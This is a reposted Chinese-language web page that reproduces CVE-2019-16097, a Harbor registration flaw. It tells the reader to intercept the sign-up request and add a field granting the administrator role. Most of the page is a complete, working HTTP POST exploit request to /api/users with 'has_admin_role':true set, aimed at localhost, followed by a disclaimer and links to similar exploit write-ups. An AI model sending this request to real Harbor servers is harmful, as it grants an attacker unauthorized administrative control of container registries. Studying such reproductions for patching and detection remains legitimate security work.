碼上快樂

相關內容    簡體    繁體

Harbor任意管理員注冊漏洞復現CVE-2019-16097

本文轉載自   查看原文   2019-09-21 10:24   892    滲透測試

注冊時抓包

添加poc

"has_admin_role":true

管理員權限

POC

POST /api/users HTTP/1.1
Host: 127.0.0.1
Content-Length: 131
Accept: application/json
Origin: http://127.0.0.1
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Content-Type: application/json
Referer: http://127.0.0.1/harbor/sign-in
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=5bb9aad90164bd2ed5274edaf20f9c81
Connection: close

{"username":"mrhonest","email":"mrhonest@qq.com","realname":"mrhonest","password":"111111Aaa","comment":"11111","has_admin_role":true}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Harbor任意管理員注冊漏洞復現 CVE-2019-0708漏洞復現 CVE-2019-17558漏洞復現 CVE-2019-0708漏洞復現 CVE-2019-0708漏洞復現 CVE-2019-15107漏洞復現 dedecms 最新版本修改任意管理員漏洞 0day [漏洞復現]CVE-2019-14287 sudo提權漏洞 CVE-2020-11107:XAMPP任意命令執行漏洞復現 CVE 2019-0708漏洞復現防御修復
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM